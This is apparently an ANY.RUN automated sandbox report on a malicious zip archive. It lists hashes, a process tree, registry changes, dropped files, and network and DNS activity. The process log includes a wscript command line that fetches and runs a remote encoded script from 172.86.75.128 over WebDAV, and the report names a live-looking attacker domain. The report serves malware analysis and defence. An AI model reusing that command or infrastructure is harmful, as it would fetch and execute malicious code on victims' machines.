File name:

Sin confirmar 160124.crdownload.zip

Full analysis: https://app.any.run/tasks/49038a1e-b7e8-410a-9140-3becf521fa55
Verdict: Malicious activity
Analysis date: October 18, 2023, 18:09:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

DC16EBAECB142B815AC92F21F464CEF3

SHA1:

FE271CFB6D95BEEF0FA240B4C2DB17E48534221A

SHA256:

5A1C971F8F6AC48BFB859E40F7D3473004E4FDD3D5CA5B59825898A0FD09373C

SSDEEP:

12:5jwrqME4Rg4TJbD5hYBd3aMaWuPBS20vp7T8E3GFmUBF/Y6Gd7/J5DVBd1qB5rsE:9jx4a4FZOyMiZbE3eTFad7faBGxfpUv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual connection from system programs

      • wscript.exe (PID: 2372)
  • SUSPICIOUS

    • Application launched itself

      • WinRAR.exe (PID: 3820)
    • Uses pipe srvsvc via SMB (transferring data)

      • WinRAR.exe (PID: 3044)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3044)
    • Checks Windows Trust Settings

      • WinRAR.exe (PID: 3044)
    • The process downloads a VBScript from the remote host

      • WinRAR.exe (PID: 3044)
    • Adds/modifies Windows certificates

      • WinRAR.exe (PID: 3044)
    • Reads the Internet Settings

      • wscript.exe (PID: 2372)
  • INFO

    • Checks proxy server information

      • WinRAR.exe (PID: 3044)
      • wscript.exe (PID: 2372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2023:10:18 17:07:06
ZipCRC: 0x155040d0
ZipCompressedSize: 469
ZipUncompressedSize: 715
ZipFileName: Sin confirmar 160124.crdownload
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
3
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winrar.exe wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
2372"C:\Windows\System32\WScript.exe" "\\172.86.75.128@8080\pub\iXklskEJ6J5sFz9UtJskfIcRT.jse" C:\Windows\System32\wscript.exe
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\kernel32.dll
c:\windows\system32\wscript.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
3044"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb3820.6718\Sin confirmar 160124.crdownload"C:\Program Files\WinRAR\WinRAR.exe
WinRAR.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3820"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sin confirmar 160124.crdownload.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
Total events
8 885
Read events
8 787
Write events
95
Delete events
3

Modification events

(PID) Process:(3820) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
0
Suspicious files
11
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2372wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157compressed
MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
SHA256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
3820WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb3820.6718\Sin confirmar 160124.crdownloadcompressed
MD5:C020472AAB5822E787E1375BA267D1CF
SHA256:D34434025A331620FC593409E07BBCF4C8F093D3124CF2DFDEEF7EE73C06E3F6
2372wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:C2617EC126065D11589B1575A4214646
SHA256:51546DBDD4A5A8C98C5AECAE346499DEB5840448B634AEDCD8B438B01F26D26E
2372wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:7B492F188EA59FD210612D6C42AF3F3F
SHA256:757C459937A269C8DE89D3F54A89759C0FFF39CA077E1E12861BA8E0B4915D01
2372wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:586D8ECA9BA55D136A6DF683E9B06C48
SHA256:738D90E0AF3C52DFC1C758E1AD2E5EF66E32060E3D7935B2F6A235AA8F5B2411
2372wscript.exeC:\Users\admin\AppData\Local\Temp\Cab651C.tmpcompressed
MD5:F3441B8572AAE8801C04F3060B550443
SHA256:6720349E7D82EE0A8E73920D3C2B7CB2912D9FCF2EDB6FD98F2F12820158B0BF
2372wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:F3441B8572AAE8801C04F3060B550443
SHA256:6720349E7D82EE0A8E73920D3C2B7CB2912D9FCF2EDB6FD98F2F12820158B0BF
2372wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751binary
MD5:60FE01DF86BE2E5331B0CDBE86165686
SHA256:C08CCBC876CD5A7CDFA9670F9637DA57F6A1282198A9BC71FC7D7247A6E5B7A8
2372wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61binary
MD5:E31ED278C5D7B9982FFF9989BA87A876
SHA256:C9EC77496837A476385B25389FADF30E26ED1C39744CDAA16E064F0C2C3BDECC
3044WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3044.8404\Consultas_CURP_v01.urltext
MD5:C0C2E678A39ABFDCE543277B875B3DA7
SHA256:65FE16321DB4F2D4F19552636F40373783611076C628D188F8A0B96316C141D3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
10
DNS requests
4
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
824
svchost.exe
OPTIONS
200
172.86.75.128:8080
http://172.86.75.128:8080/pub
unknown
unknown
824
svchost.exe
PROPFIND
207
172.86.75.128:8080
http://172.86.75.128:8080/pub/iXklskEJ6J5sFz9UtJskfIcRT.jse
unknown
xml
945 b
unknown
824
svchost.exe
PROPFIND
207
172.86.75.128:8080
http://172.86.75.128:8080/pub
unknown
xml
879 b
unknown
824
svchost.exe
PROPFIND
207
172.86.75.128:8080
http://172.86.75.128:8080/pub
unknown
xml
879 b
unknown
GET
200
209.197.3.8:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d1535f55cdd21215
unknown
compressed
61.6 Kb
unknown
824
svchost.exe
PROPFIND
207
172.86.75.128:8080
http://172.86.75.128:8080/pub/iXklskEJ6J5sFz9UtJskfIcRT.jse
unknown
xml
945 b
unknown
824
svchost.exe
PROPFIND
207
172.86.75.128:8080
http://172.86.75.128:8080/pub
unknown
xml
879 b
unknown
824
svchost.exe
GET
200
172.86.75.128:8080
http://172.86.75.128:8080/pub/iXklskEJ6J5sFz9UtJskfIcRT.jse
unknown
binary
177 Kb
unknown
2372
wscript.exe
GET
200
23.197.120.82:80
http://x2.c.lencr.org/
unknown
binary
300 b
unknown
GET
200
209.197.3.8:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?b7c570eea0daf6ca
unknown
compressed
4.66 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1088
svchost.exe
224.0.0.252:5355
unknown
2656
svchost.exe
239.255.255.250:1900
whitelisted
3044
WinRAR.exe
172.86.75.128:8080
BLNWX
NL
unknown
824
svchost.exe
172.86.75.128:8080
BLNWX
NL
unknown
2372
wscript.exe
188.114.97.3:443
mensualgeneratr.com
CLOUDFLARENET
NL
unknown
2372
wscript.exe
209.197.3.8:80
ctldl.windowsupdate.com
STACKPATH-CDN
US
whitelisted
2372
wscript.exe
104.122.38.61:80
x1.c.lencr.org
AKAMAI-AS
DE
unknown
2372
wscript.exe
23.197.120.82:80
x2.c.lencr.org
Akamai International B.V.
US
unknown

DNS requests

Domain
IP
Reputation
mensualgeneratr.com
  • 188.114.97.3
  • 188.114.96.3
unknown
ctldl.windowsupdate.com
  • 209.197.3.8
whitelisted
x1.c.lencr.org
  • 104.122.38.61
whitelisted
x2.c.lencr.org
  • 23.197.120.82
whitelisted

Threats

PID
Process
Class
Message
824
svchost.exe
Misc activity
ET INFO Microsoft Script Encoder Encoded File
1 ETPRO signatures available at the full report
No debug info